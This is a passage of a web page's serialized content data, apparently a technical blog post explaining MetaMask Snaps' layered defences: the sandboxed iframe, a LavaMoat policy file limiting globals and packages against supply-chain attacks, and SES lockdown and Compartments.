initEnvStream",{"type":25,"tag":216,"props":40335,"children":40336},{"style":6964},[40337],{"type":31,"value":1850},{"type":25,"tag":216,"props":40339,"children":40340},{"style":6947},[40341],{"type":31,"value":40160},{"type":25,"tag":216,"props":40343,"children":40344},{"style":6964},[40345],{"type":31,"value":19288},{"type":25,"tag":216,"props":40347,"children":40348},{"style":6947},[40349],{"type":31,"value":33627},{"type":25,"tag":216,"props":40351,"children":40352},{"style":6964},[40353],{"type":31,"value":40354},"): ",{"type":25,"tag":216,"props":40356,"children":40357},{"style":7375},[40358],{"type":31,"value":40359},"Promise",{"type":25,"tag":216,"props":40361,"children":40362},{"style":6964},[40363],{"type":31,"value":40364},"\u003C{\n",{"type":25,"tag":216,"props":40366,"children":40367},{"class":6922,"line":6769},[40368,40373,40377,40382],{"type":25,"tag":216,"props":40369,"children":40370},{"style":6947},[40371],{"type":31,"value":40372},"    worker",{"type":25,"tag":216,"props":40374,"children":40375},{"style":6953},[40376],{"type":31,"value":1472},{"type":25,"tag":216,"props":40378,"children":40379},{"style":7375},[40380],{"type":31,"value":40381}," Window",{"type":25,"tag":216,"props":40383,"children":40384},{"style":6964},[40385],{"type":31,"value":6967},{"type":25,"tag":216,"props":40387,"children":40388},{"class":6922,"line":6778},[40389,40394,40398,40403],{"type":25,"tag":216,"props":40390,"children":40391},{"style":6947},[40392],{"type":31,"value":40393},"    stream",{"type":25,"tag":216,"props":40395,"children":40396},{"style":6953},[40397],{"type":31,"value":1472},{"type":25,"tag":216,"props":40399,"children":40400},{"style":7375},[40401],{"type":31,"value":40402}," BasePostMessageStream",{"type":25,"tag":216,"props":40404,"children":40405},{"style":6964},[40406],{"type":31,"value":6967},{"type":25,"tag":216,"props":40408,"children":40409},{"class":6922,"line":7005},[40410],{"type":25,"tag":216,"props":40411,"children":40412},{"style":6964},[40413],{"type":31,"value":40414},"  }> {\n",{"type":25,"tag":216,"props":40416,"children":40417},{"class":6922,"line":7110},[40418,40423,40428,40432,40436,40441,40445,40449,40453,40458,40462,40467,40471,40475],{"type":25,"tag":216,"props":40419,"children":40420},{"style":6964},[40421],{"type":31,"value":40422},"    const ",{"type":25,"tag":216,"props":40424,"children":40425},{"style":6947},[40426],{"type":31,"value":40427},"iframeWindow",{"type":25,"tag":216,"props":40429,"children":40430},{"style":6953},[40431],{"type":31,"value":6956},{"type":25,"tag":216,"props":40433,"children":40434},{"style":6973},[40435],{"type":31,"value":40174},{"type":25,"tag":216,"props":40437,"children":40438},{"style":7047},[40439],{"type":31,"value":40440}," createWindow",{"type":25,"tag":216,"props":40442,"children":40443},{"style":6964},[40444],{"type":31,"value":1850},{"type":25,"tag":216,"props":40446,"children":40447},{"style":6936},[40448],{"type":31,"value":21651},{"type":25,"tag":216,"props":40450,"children":40451},{"style":6964},[40452],{"type":31,"value":179},{"type":25,"tag":216,"props":40454,"children":40455},{"style":6947},[40456],{"type":31,"value":40457},"iframeUrl",{"type":25,"tag":216,"props":40459,"children":40460},{"style":6964},[40461],{"type":31,"value":179},{"type":25,"tag":216,"props":40463,"children":40464},{"style":7047},[40465],{"type":31,"value":40466},"toString",{"type":25,"tag":216,"props":40468,"children":40469},{"style":6964},[40470],{"type":31,"value":22334},{"type":25,"tag":216,"props":40472,"children":40473},{"style":6947},[40474],{"type":31,"value":40160},{"type":25,"tag":216,"props":40476,"children":40477},{"style":6964},[40478],{"type":31,"value":7797},{"type":25,"tag":216,"props":40480,"children":40481},{"class":6922,"line":7216},[40482],{"type":25,"tag":216,"props":40483,"children":40484},{"emptyLinePlaceholder":16},[40485],{"type":31,"value":7642},{"type":25,"tag":216,"props":40487,"children":40488},{"class":6922,"line":7244},[40489,40493,40497,40501,40505,40510],{"type":25,"tag":216,"props":40490,"children":40491},{"style":6964},[40492],{"type":31,"value":40422},{"type":25,"tag":216,"props":40494,"children":40495},{"style":6947},[40496],{"type":31,"value":40224},{"type":25,"tag":216,"props":40498,"children":40499},{"style":6953},[40500],{"type":31,"value":6956},{"type":25,"tag":216,"props":40502,"children":40503},{"style":6936},[40504],{"type":31,"value":35895},{"type":25,"tag":216,"props":40506,"children":40507},{"style":7047},[40508],{"type":31,"value":40509}," WindowPostMessageStream",{"type":25,"tag":216,"props":40511,"children":40512},{"style":6964},[40513],{"type":31,"value":19098},{"type":25,"tag":216,"props":40515,"children":40516},{"class":6922,"line":7257},[40517,40522,40527],{"type":25,"tag":216,"props":40518,"children":40519},{"style":6947},[40520],{"type":31,"value":40521},"      name:",{"type":25,"tag":216,"props":40523,"children":40524},{"style":8205},[40525],{"type":31,"value":40526}," 'parent'",{"type":25,"tag":216,"props":40528,"children":40529},{"style":6964},[40530],{"type":31,"value":7465},{"type":25,"tag":216,"props":40532,"children":40533},{"class":6922,"line":7275},[40534,40539,40544],{"type":25,"tag":216,"props":40535,"children":40536},{"style":6947},[40537],{"type":31,"value":40538},"      target:",{"type":25,"tag":216,"props":40540,"children":40541},{"style":8205},[40542],{"type":31,"value":40543}," 'child'",{"type":25,"tag":216,"props":40545,"children":40546},{"style":6964},[40547],{"type":31,"value":7465},{"type":25,"tag":216,"props":40549,"children":40550},{"class":6922,"line":7296},[40551,40556,40561],{"type":25,"tag":216,"props":40552,"children":40553},{"style":6947},[40554],{"type":31,"value":40555},"      targetWindow:",{"type":25,"tag":216,"props":40557,"children":40558},{"style":6947},[40559],{"type":31,"value":40560}," iframeWindow",{"type":25,"tag":216,"props":40562,"children":40563},{"style":6964},[40564],{"type":31,"value":7465},{"type":25,"tag":216,"props":40566,"children":40567},{"class":6922,"line":7305},[40568,40573,40578],{"type":25,"tag":216,"props":40569,"children":40570},{"style":6947},[40571],{"type":31,"value":40572},"      targetOrigin:",{"type":25,"tag":216,"props":40574,"children":40575},{"style":8205},[40576],{"type":31,"value":40577}," '*'",{"type":25,"tag":216,"props":40579,"children":40580},{"style":6964},[40581],{"type":31,"value":7465},{"type":25,"tag":216,"props":40583,"children":40584},{"class":6922,"line":7557},[40585],{"type":25,"tag":216,"props":40586,"children":40587},{"style":6964},[40588],{"type":31,"value":36219},{"type":25,"tag":216,"props":40590,"children":40591},{"class":6922,"line":7574},[40592],{"type":25,"tag":216,"props":40593,"children":40594},{"emptyLinePlaceholder":16},[40595],{"type":31,"value":7642},{"type":25,"tag":216,"props":40597,"children":40598},{"class":6922,"line":7591},[40599,40604,40608,40612,40616],{"type":25,"tag":216,"props":40600,"children":40601},{"style":6964},[40602],{"type":31,"value":40603},"    return { worker: ",{"type":25,"tag":216,"props":40605,"children":40606},{"style":6947},[40607],{"type":31,"value":40427},{"type":25,"tag":216,"props":40609,"children":40610},{"style":6964},[40611],{"type":31,"value":7026},{"type":25,"tag":216,"props":40613,"children":40614},{"style":6947},[40615],{"type":31,"value":40224},{"type":25,"tag":216,"props":40617,"children":40618},{"style":6964},[40619],{"type":31,"value":22258},{"type":25,"tag":216,"props":40621,"children":40622},{"class":6922,"line":7604},[40623],{"type":25,"tag":216,"props":40624,"children":40625},{"style":6964},[40626],{"type":31,"value":9823},{"type":25,"tag":38,"props":40628,"children":40629},{},[40630,40632,40638,40640,40647],{"type":31,"value":40631},"Here the iframe is created via ",{"type":25,"tag":82,"props":40633,"children":40635},{"className":40634},[],[40636],{"type":31,"value":40637},"createWindow",{"type":31,"value":40639},", which is defined in snaps-utils ",{"type":25,"tag":162,"props":40641,"children":40644},{"href":40642,"rel":40643},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-utils/src/iframe.ts#L17",[166],[40645],{"type":31,"value":40646},"package",{"type":31,"value":1472},{"type":25,"tag":206,"props":40649,"children":40651},{"className":39893,"code":40650,"language":39895,"meta":7,"style":7},"const iframe = document.createElement('iframe');\n    iframe.setAttribute('id', id);\n    iframe.setAttribute('data-testid', 'snaps-iframe');\n\n    if (sandbox) {\n      iframe.setAttribute('sandbox', 'allow-scripts');\n    }\n    iframe.setAttribute('src', uri);\n    document.body.appendChild(iframe);\n",[40652],{"type":25,"tag":82,"props":40653,"children":40654},{"__ignoreMap":7},[40655,40698,40736,40773,40780,40800,40838,40845,40882],{"type":25,"tag":216,"props":40656,"children":40657},{"class":6922,"line":6923},[40658,40662,40667,40671,40676,40680,40685,40689,40694],{"type":25,"tag":216,"props":40659,"children":40660},{"style":6936},[40661],{"type":31,"value":13611},{"type":25,"tag":216,"props":40663,"children":40664},{"style":6947},[40665],{"type":31,"value":40666}," iframe",{"type":25,"tag":216,"props":40668,"children":40669},{"style":6953},[40670],{"type":31,"value":6956},{"type":25,"tag":216,"props":40672,"children":40673},{"style":6947},[40674],{"type":31,"value":40675}," document",{"type":25,"tag":216,"props":40677,"children":40678},{"style":6964},[40679],{"type":31,"value":179},{"type":25,"tag":216,"props":40681,"children":40682},{"style":7047},[40683],{"type":31,"value":40684},"createElement",{"type":25,"tag":216,"props":40686,"children":40687},{"style":6964},[40688],{"type":31,"value":1850},{"type":25,"tag":216,"props":40690,"children":40691},{"style":8205},[40692],{"type":31,"value":40693},"'iframe'",{"type":25,"tag":216,"props":40695,"children":40696},{"style":6964},[40697],{"type":31,"value":7797},{"type":25,"tag":216,"props":40699,"children":40700},{"class":6922,"line":6769},[40701,40706,40710,40715,40719,40724,40728,40732],{"type":25,"tag":216,"props":40702,"children":40703},{"style":6947},[40704],{"type":31,"value":40705},"    iframe",{"type":25,"tag":216,"props":40707,"children":40708},{"style":6964},[40709],{"type":31,"value":179},{"type":25,"tag":216,"props":40711,"children":40712},{"style":7047},[40713],{"type":31,"value":40714},"setAttribute",{"type":25,"tag":216,"props":40716,"children":40717},{"style":6964},[40718],{"type":31,"value":1850},{"type":25,"tag":216,"props":40720,"children":40721},{"style":8205},[40722],{"type":31,"value":40723},"'id'",{"type":25,"tag":216,"props":40725,"children":40726},{"style":6964},[40727],{"type":31,"value":7026},{"type":25,"tag":216,"props":40729,"children":40730},{"style":6947},[40731],{"type":31,"value":7443},{"type":25,"tag":216,"props":40733,"children":40734},{"style":6964},[40735],{"type":31,"value":7797},{"type":25,"tag":216,"props":40737,"children":40738},{"class":6922,"line":6778},[40739,40743,40747,40751,40755,40760,40764,40769],{"type":25,"tag":216,"props":40740,"children":40741},{"style":6947},[40742],{"type":31,"value":40705},{"type":25,"tag":216,"props":40744,"children":40745},{"style":6964},[40746],{"type":31,"value":179},{"type":25,"tag":216,"props":40748,"children":40749},{"style":7047},[40750],{"type":31,"value":40714},{"type":25,"tag":216,"props":40752,"children":40753},{"style":6964},[40754],{"type":31,"value":1850},{"type":25,"tag":216,"props":40756,"children":40757},{"style":8205},[40758],{"type":31,"value":40759},"'data-testid'",{"type":25,"tag":216,"props":40761,"children":40762},{"style":6964},[40763],{"type":31,"value":7026},{"type":25,"tag":216,"props":40765,"children":40766},{"style":8205},[40767],{"type":31,"value":40768},"'snaps-iframe'",{"type":25,"tag":216,"props":40770,"children":40771},{"style":6964},[40772],{"type":31,"value":7797},{"type":25,"tag":216,"props":40774,"children":40775},{"class":6922,"line":7005},[40776],{"type":25,"tag":216,"props":40777,"children":40778},{"emptyLinePlaceholder":16},[40779],{"type":31,"value":7642},{"type":25,"tag":216,"props":40781,"children":40782},{"class":6922,"line":7110},[40783,40787,40791,40796],{"type":25,"tag":216,"props":40784,"children":40785},{"style":6973},[40786],{"type":31,"value":16235},{"type":25,"tag":216,"props":40788,"children":40789},{"style":6964},[40790],{"type":31,"value":7016},{"type":25,"tag":216,"props":40792,"children":40793},{"style":6947},[40794],{"type":31,"value":40795},"sandbox",{"type":25,"tag":216,"props":40797,"children":40798},{"style":6964},[40799],{"type":31,"value":18761},{"type":25,"tag":216,"props":40801,"children":40802},{"class":6922,"line":7216},[40803,40808,40812,40816,40820,40825,40829,40834],{"type":25,"tag":216,"props":40804,"children":40805},{"style":6947},[40806],{"type":31,"value":40807},"      iframe",{"type":25,"tag":216,"props":40809,"children":40810},{"style":6964},[40811],{"type":31,"value":179},{"type":25,"tag":216,"props":40813,"children":40814},{"style":7047},[40815],{"type":31,"value":40714},{"type":25,"tag":216,"props":40817,"children":40818},{"style":6964},[40819],{"type":31,"value":1850},{"type":25,"tag":216,"props":40821,"children":40822},{"style":8205},[40823],{"type":31,"value":40824},"'sandbox'",{"type":25,"tag":216,"props":40826,"children":40827},{"style":6964},[40828],{"type":31,"value":7026},{"type":25,"tag":216,"props":40830,"children":40831},{"style":8205},[40832],{"type":31,"value":40833},"'allow-scripts'",{"type":25,"tag":216,"props":40835,"children":40836},{"style":6964},[40837],{"type":31,"value":7797},{"type":25,"tag":216,"props":40839,"children":40840},{"class":6922,"line":7244},[40841],{"type":25,"tag":216,"props":40842,"children":40843},{"style":6964},[40844],{"type":31,"value":7311},{"type":25,"tag":216,"props":40846,"children":40847},{"class":6922,"line":7257},[40848,40852,40856,40860,40864,40869,40873,40878],{"type":25,"tag":216,"props":40849,"children":40850},{"style":6947},[40851],{"type":31,"value":40705},{"type":25,"tag":216,"props":40853,"children":40854},{"style":6964},[40855],{"type":31,"value":179},{"type":25,"tag":216,"props":40857,"children":40858},{"style":7047},[40859],{"type":31,"value":40714},{"type":25,"tag":216,"props":40861,"children":40862},{"style":6964},[40863],{"type":31,"value":1850},{"type":25,"tag":216,"props":40865,"children":40866},{"style":8205},[40867],{"type":31,"value":40868},"'src'",{"type":25,"tag":216,"props":40870,"children":40871},{"style":6964},[40872],{"type":31,"value":7026},{"type":25,"tag":216,"props":40874,"children":40875},{"style":6947},[40876],{"type":31,"value":40877},"uri",{"type":25,"tag":216,"props":40879,"children":40880},{"style":6964},[40881],{"type":31,"value":7797},{"type":25,"tag":216,"props":40883,"children":40884},{"class":6922,"line":7275},[40885,40889,40893,40897,40901,40906,40910,40915],{"type":25,"tag":216,"props":40886,"children":40887},{"style":6947},[40888],{"type":31,"value":38636},{"type":25,"tag":216,"props":40890,"children":40891},{"style":6964},[40892],{"type":31,"value":179},{"type":25,"tag":216,"props":40894,"children":40895},{"style":6947},[40896],{"type":31,"value":36362},{"type":25,"tag":216,"props":40898,"children":40899},{"style":6964},[40900],{"type":31,"value":179},{"type":25,"tag":216,"props":40902,"children":40903},{"style":7047},[40904],{"type":31,"value":40905},"appendChild",{"type":25,"tag":216,"props":40907,"children":40908},{"style":6964},[40909],{"type":31,"value":1850},{"type":25,"tag":216,"props":40911,"children":40912},{"style":6947},[40913],{"type":31,"value":40914},"iframe",{"type":25,"tag":216,"props":40916,"children":40917},{"style":6964},[40918],{"type":31,"value":7797},{"type":25,"tag":38,"props":40920,"children":40921},{},[40922],{"type":31,"value":40923},"This enables the iframe to be created with sandbox attributes, ensuring secure execution.",{"type":25,"tag":606,"props":40925,"children":40927},{"id":40926},"lavamoat-against-supply-chain-attacks-layer-2",[40928],{"type":31,"value":40929},"LavaMoat against Supply Chain Attacks - Layer 2",{"type":25,"tag":38,"props":40931,"children":40932},{},[40933],{"type":31,"value":40934},"Instances of software supply chain breaches occur when a malicious component infiltrates a developer's application. Subsequently, attackers exploit the component to extract critical information, such as private access keys. To safeguard against these issues, Metamask employs a tool called LavaMoat.",{"type":25,"tag":38,"props":40936,"children":40937},{},[40938,40940,40946],{"type":31,"value":40939},"Malicious dependencies might utilize built-in modules like ",{"type":25,"tag":82,"props":40941,"children":40943},{"className":40942},[],[40944],{"type":31,"value":40945},"fs",{"type":31,"value":40947},". Alternatively, they may inject malicious code into the npm package to target global objects, like the window and document. They might also include code that leverages XMLHttpRequest to make unauthorized requests to external servers, enabling the exfiltration of sensitive user information.",{"type":25,"tag":38,"props":40949,"children":40950},{},[40951],{"type":31,"value":40952},"In order to prevent this, Metamask Snaps use a Policy file provided by LavaMoat, that grants the platform API and the Globals access just to the essentials components. This limits the access to fields of powerful objects to corrupted dependencies.",{"type":25,"tag":38,"props":40954,"children":40955},{},[40956,40958,40965],{"type":31,"value":40957},"This is how a Policy file related to the iframes ",{"type":25,"tag":162,"props":40959,"children":40962},{"href":40960,"rel":40961},"https://github.com/MetaMask/snaps/blob/c5ddd897734f900f459c66a91f3334e76903825c/packages/snaps-execution-environments/lavamoat/browserify/iframe/policy.json#L49",[166],[40963],{"type":31,"value":40964},"looks",{"type":31,"value":1472},{"type":25,"tag":206,"props":40967,"children":40969},{"className":37958,"code":40968,"language":37960,"meta":7,"style":7},"\"@metamask/post-message-stream\": {\n      \"globals\": {\n        \"MessageEvent.prototype\": true,\n        \"WorkerGlobalScope\": true,\n        \"addEventListener\": true,\n        \"browser\": true,\n        \"chrome\": true,\n        \"location.origin\": true,\n        \"postMessage\": true,\n        \"removeEventListener\": true\n      },\n      \"packages\": {\n        \"@metamask/post-message-stream>@metamask/utils\": true,\n        \"@metamask/post-message-stream>readable-stream\": true\n      }\n    }\n",[40970],{"type":25,"tag":82,"props":40971,"children":40972},{"__ignoreMap":7},[40973,40986,40998,41018,41038,41058,41078,41098,41118,41138,41155,41163,41175,41195,41211,41218],{"type":25,"tag":216,"props":40974,"children":40975},{"class":6922,"line":6923},[40976,40981],{"type":25,"tag":216,"props":40977,"children":40978},{"style":8205},[40979],{"type":31,"value":40980},"\"@metamask/post-message-stream\"",{"type":25,"tag":216,"props":40982,"children":40983},{"style":6964},[40984],{"type":31,"value":40985},": {\n",{"type":25,"tag":216,"props":40987,"children":40988},{"class":6922,"line":6769},[40989,40994],{"type":25,"tag":216,"props":40990,"children":40991},{"style":6947},[40992],{"type":31,"value":40993},"      \"globals\"",{"type":25,"tag":216,"props":40995,"children":40996},{"style":6964},[40997],{"type":31,"value":40985},{"type":25,"tag":216,"props":40999,"children":41000},{"class":6922,"line":6778},[41001,41006,41010,41014],{"type":25,"tag":216,"props":41002,"children":41003},{"style":6947},[41004],{"type":31,"value":41005},"        \"MessageEvent.prototype\"",{"type":25,"tag":216,"props":41007,"children":41008},{"style":6964},[41009],{"type":31,"value":19288},{"type":25,"tag":216,"props":41011,"children":41012},{"style":6936},[41013],{"type":31,"value":230},{"type":25,"tag":216,"props":41015,"children":41016},{"style":6964},[41017],{"type":31,"value":7465},{"type":25,"tag":216,"props":41019,"children":41020},{"class":6922,"line":7005},[41021,41026,41030,41034],{"type":25,"tag":216,"props":41022,"children":41023},{"style":6947},[41024],{"type":31,"value":41025},"        \"WorkerGlobalScope\"",{"type":25,"tag":216,"props":41027,"children":41028},{"style":6964},[41029],{"type":31,"value":19288},{"type":25,"tag":216,"props":41031,"children":41032},{"style":6936},[41033],{"type":31,"value":230},{"type":25,"tag":216,"props":41035,"children":41036},{"style":6964},[41037],{"type":31,"value":7465},{"type":25,"tag":216,"props":41039,"children":41040},{"class":6922,"line":7110},[41041,41046,41050,41054],{"type":25,"tag":216,"props":41042,"children":41043},{"style":6947},[41044],{"type":31,"value":41045},"        \"addEventListener\"",{"type":25,"tag":216,"props":41047,"children":41048},{"style":6964},[41049],{"type":31,"value":19288},{"type":25,"tag":216,"props":41051,"children":41052},{"style":6936},[41053],{"type":31,"value":230},{"type":25,"tag":216,"props":41055,"children":41056},{"style":6964},[41057],{"type":31,"value":7465},{"type":25,"tag":216,"props":41059,"children":41060},{"class":6922,"line":7216},[41061,41066,41070,41074],{"type":25,"tag":216,"props":41062,"children":41063},{"style":6947},[41064],{"type":31,"value":41065},"        \"browser\"",{"type":25,"tag":216,"props":41067,"children":41068},{"style":6964},[41069],{"type":31,"value":19288},{"type":25,"tag":216,"props":41071,"children":41072},{"style":6936},[41073],{"type":31,"value":230},{"type":25,"tag":216,"props":41075,"children":41076},{"style":6964},[41077],{"type":31,"value":7465},{"type":25,"tag":216,"props":41079,"children":41080},{"class":6922,"line":7244},[41081,41086,41090,41094],{"type":25,"tag":216,"props":41082,"children":41083},{"style":6947},[41084],{"type":31,"value":41085},"        \"chrome\"",{"type":25,"tag":216,"props":41087,"children":41088},{"style":6964},[41089],{"type":31,"value":19288},{"type":25,"tag":216,"props":41091,"children":41092},{"style":6936},[41093],{"type":31,"value":230},{"type":25,"tag":216,"props":41095,"children":41096},{"style":6964},[41097],{"type":31,"value":7465},{"type":25,"tag":216,"props":41099,"children":41100},{"class":6922,"line":7257},[41101,41106,41110,41114],{"type":25,"tag":216,"props":41102,"children":41103},{"style":6947},[41104],{"type":31,"value":41105},"        \"location.origin\"",{"type":25,"tag":216,"props":41107,"children":41108},{"style":6964},[41109],{"type":31,"value":19288},{"type":25,"tag":216,"props":41111,"children":41112},{"style":6936},[41113],{"type":31,"value":230},{"type":25,"tag":216,"props":41115,"children":41116},{"style":6964},[41117],{"type":31,"value":7465},{"type":25,"tag":216,"props":41119,"children":41120},{"class":6922,"line":7275},[41121,41126,41130,41134],{"type":25,"tag":216,"props":41122,"children":41123},{"style":6947},[41124],{"type":31,"value":41125},"        \"postMessage\"",{"type":25,"tag":216,"props":41127,"children":41128},{"style":6964},[41129],{"type":31,"value":19288},{"type":25,"tag":216,"props":41131,"children":41132},{"style":6936},[41133],{"type":31,"value":230},{"type":25,"tag":216,"props":41135,"children":41136},{"style":6964},[41137],{"type":31,"value":7465},{"type":25,"tag":216,"props":41139,"children":41140},{"class":6922,"line":7296},[41141,41146,41150],{"type":25,"tag":216,"props":41142,"children":41143},{"style":6947},[41144],{"type":31,"value":41145},"        \"removeEventListener\"",{"type":25,"tag":216,"props":41147,"children":41148},{"style":6964},[41149],{"type":31,"value":19288},{"type":25,"tag":216,"props":41151,"children":41152},{"style":6936},[41153],{"type":31,"value":41154},"true\n",{"type":25,"tag":216,"props":41156,"children":41157},{"class":6922,"line":7305},[41158],{"type":25,"tag":216,"props":41159,"children":41160},{"style":6964},[41161],{"type":31,"value":41162},"      },\n",{"type":25,"tag":216,"props":41164,"children":41165},{"class":6922,"line":7557},[41166,41171],{"type":25,"tag":216,"props":41167,"children":41168},{"style":6947},[41169],{"type":31,"value":41170},"      \"packages\"",{"type":25,"tag":216,"props":41172,"children":41173},{"style":6964},[41174],{"type":31,"value":40985},{"type":25,"tag":216,"props":41176,"children":41177},{"class":6922,"line":7574},[41178,41183,41187,41191],{"type":25,"tag":216,"props":41179,"children":41180},{"style":6947},[41181],{"type":31,"value":41182},"        \"@metamask/post-message-stream>@metamask/utils\"",{"type":25,"tag":216,"props":41184,"children":41185},{"style":6964},[41186],{"type":31,"value":19288},{"type":25,"tag":216,"props":41188,"children":41189},{"style":6936},[41190],{"type":31,"value":230},{"type":25,"tag":216,"props":41192,"children":41193},{"style":6964},[41194],{"type":31,"value":7465},{"type":25,"tag":216,"props":41196,"children":41197},{"class":6922,"line":7591},[41198,41203,41207],{"type":25,"tag":216,"props":41199,"children":41200},{"style":6947},[41201],{"type":31,"value":41202},"        \"@metamask/post-message-stream>readable-stream\"",{"type":25,"tag":216,"props":41204,"children":41205},{"style":6964},[41206],{"type":31,"value":19288},{"type":25,"tag":216,"props":41208,"children":41209},{"style":6936},[41210],{"type":31,"value":41154},{"type":25,"tag":216,"props":41212,"children":41213},{"class":6922,"line":7604},[41214],{"type":25,"tag":216,"props":41215,"children":41216},{"style":6964},[41217],{"type":31,"value":16620},{"type":25,"tag":216,"props":41219,"children":41220},{"class":6922,"line":7613},[41221],{"type":25,"tag":216,"props":41222,"children":41223},{"style":6964},[41224],{"type":31,"value":7311},{"type":25,"tag":38,"props":41226,"children":41227},{},[41228,41230,41236,41238,41244,41246,41252,41254,41260,41261,41267],{"type":31,"value":41229},"One crucial aspect of the policy, apart from the ",{"type":25,"tag":82,"props":41231,"children":41233},{"className":41232},[],[41234],{"type":31,"value":41235},"globals",{"type":31,"value":41237}," section, is the ",{"type":25,"tag":82,"props":41239,"children":41241},{"className":41240},[],[41242],{"type":31,"value":41243},"packages",{"type":31,"value":41245}," segment. This section permits the ",{"type":25,"tag":82,"props":41247,"children":41249},{"className":41248},[],[41250],{"type":31,"value":41251},"@metamask/post-message-stream",{"type":31,"value":41253},"package to exclusively interact with the package ",{"type":25,"tag":82,"props":41255,"children":41257},{"className":41256},[],[41258],{"type":31,"value":41259},"@metamask/utils",{"type":31,"value":1307},{"type":25,"tag":82,"props":41262,"children":41264},{"className":41263},[],[41265],{"type":31,"value":41266},"readable-stream",{"type":31,"value":41268},". It ensures that interactions with potentially compromised packages are disallowed.",{"type":25,"tag":38,"props":41270,"children":41271},{},[41272,41274,41280],{"type":31,"value":41273},"LavaMoat additionally provides protection against prototype pollution attacks, since a malicious extension could use it to tamper with a legitimate function with arbitrary code. To safeguard against this, LavaMoat uses SES ",{"type":25,"tag":82,"props":41275,"children":41277},{"className":41276},[],[41278],{"type":31,"value":41279},"lockdown",{"type":31,"value":41281}," function to freeze all javascript builtins prototypes.",{"type":25,"tag":606,"props":41283,"children":41285},{"id":41284},"secure-ecmascript-ses-sandbox-layer-3",[41286],{"type":31,"value":41287},"Secure EcmaScript (SES) sandbox - Layer 3",{"type":25,"tag":38,"props":41289,"children":41290},{},[41291,41293,41300],{"type":31,"value":41292},"Within the iframe and after the lavamoat execution, the metamask sandbox uses the ",{"type":25,"tag":162,"props":41294,"children":41297},{"href":41295,"rel":41296},"https://github.com/endojs/endo/tree/master/packages/ses",[166],[41298],{"type":31,"value":41299},"Secure EcmaScript (SES)",{"type":31,"value":41301}," as a way to setup limits to the snap. Let's dig into how it works:",{"type":25,"tag":630,"props":41303,"children":41305},{"id":41304},"ses-fundamentals",[41306],{"type":31,"value":41307},"SES Fundamentals",{"type":25,"tag":41309,"props":41310,"children":41311},"h5",{"id":41279},[41312],{"type":31,"value":41313},"Lockdown",{"type":25,"tag":38,"props":41315,"children":41316},{},[41317,41319,41325],{"type":31,"value":41318},"As the first step of setting up the SES sandbox, Metamask executes the ",{"type":25,"tag":82,"props":41320,"children":41322},{"className":41321},[],[41323],{"type":31,"value":41324},"lockdown()",{"type":31,"value":41326}," function, which protects javascript objects against some attacks, mainly:",{"type":25,"tag":6711,"props":41328,"children":41329},{},[41330,41343],{"type":25,"tag":2043,"props":41331,"children":41332},{},[41333,41335,41341],{"type":31,"value":41334},"Prototype Pollution\nLockdown executes ",{"type":25,"tag":82,"props":41336,"children":41338},{"className":41337},[],[41339],{"type":31,"value":41340},"Object.freeze",{"type":31,"value":41342}," against all javascript builtins prototypes, preventing these attacks.",{"type":25,"tag":2043,"props":41344,"children":41345},{},[41346,41348,41354,41356,41362],{"type":31,"value":41347},"Information disclosure\nLockdown removes some sensitive information that can be disclosed by some javascript builtin objects, such as the ",{"type":25,"tag":82,"props":41349,"children":41351},{"className":41350},[],[41352],{"type":31,"value":41353},"trace",{"type":31,"value":41355}," attribute in an ",{"type":25,"tag":82,"props":41357,"children":41359},{"className":41358},[],[41360],{"type":31,"value":41361},"Error",{"type":31,"value":41363}," object, which contains the stack trace of the error.",{"type":25,"tag":41309,"props":41365,"children":41367},{"id":41366},"compartment",[41368],{"type":31,"value":41369},"Compartment",{"type":25,"tag":38,"props":41371,"children":41372},{},[41373,41375,41381,41383,41388],{"type":31,"value":41374},"Compartments serve as the fundamental security layer within the snap execution environment. Their primary function is to establish a tightly controlled sandboxed execution environment. This is accomplished by manipulating the ",{"type":25,"tag":82,"props":41376,"children":41378},{"className":41377},[],[41379],{"type":31,"value":41380},"globalThis",{"type":31,"value":41382}," object to exclusively accommodate secure functions. Consequently, any code executed within this controlled ",{"type":25,"tag":82,"props":41384,"children":41386},{"className":41385},[],[41387],{"type":31,"value":41380},{"type":31,"value":41389}," context is incapable of tampering with security.",{"type":25,"tag":206,"props":41391,"children":41393},{"className":39576,"code":41392,"language":39578,"meta":7,"style":7},"const c = new Compartment();\nc.globalThis === globalThis; // false\nc.globalThis.JSON === JSON; // true\n",[41394],{"type":25,"tag":82,"props":41395,"children":41396},{"__ignoreMap":7},[41397,41426,41459],{"type":25,"tag":216,"props":41398,"children":41399},{"class":6922,"line":6923},[41400,41404,41409,41413,41417,41422],{"type":25,"tag":216,"props":41401,"children":41402},{"style":6936},[41403],{"type":31,"value":13611},{"type":25,"tag":216,"props":41405,"children":41406},{"style":6947},[41407],{"type":31,"value":41408}," c",{"type":25,"tag":216,"props":41410,"children":41411},{"style":6953},[41412],{"type":31,"value":6956},{"type":25,"tag":216,"props":41414,"children":41415},{"style":6936},[41416],{"type":31,"value":35895},{"type":25,"tag":216,"props":41418,"children":41419},{"style":7047},[41420],{"type":31,"value":41421}," Compartment",{"type":25,"tag":216,"props":41423,"children":41424},{"style":6964},[41425],{"type":31,"value":7633},{"type":25,"tag":216,"props":41427,"children":41428},{"class":6922,"line":6769},[41429,41433,41437,41441,41445,41450,41454],{"type":25,"tag":216,"props":41430,"children":41431},{"style":6947},[41432],{"type":31,"value":2254},{"type":25,"tag":216,"props":41434,"children":41435},{"style":6964},[41436],{"type":31,"value":179},{"type":25,"tag":216,"props":41438,"children":41439},{"style":6947},[41440],{"type":31,"value":41380},{"type":25,"tag":216,"props":41442,"children":41443},{"style":6953},[41444],{"type":31,"value":35384},{"type":25,"tag":216,"props":41446,"children":41447},{"style":6947},[41448],{"type":31,"value":41449}," globalThis",{"type":25,"tag":216,"props":41451,"children":41452},{"style":6964},[41453],{"type":31,"value":21184},{"type":25,"tag":216,"props":41455,"children":41456},{"style":6927},[41457],{"type":31,"value":41458},"// 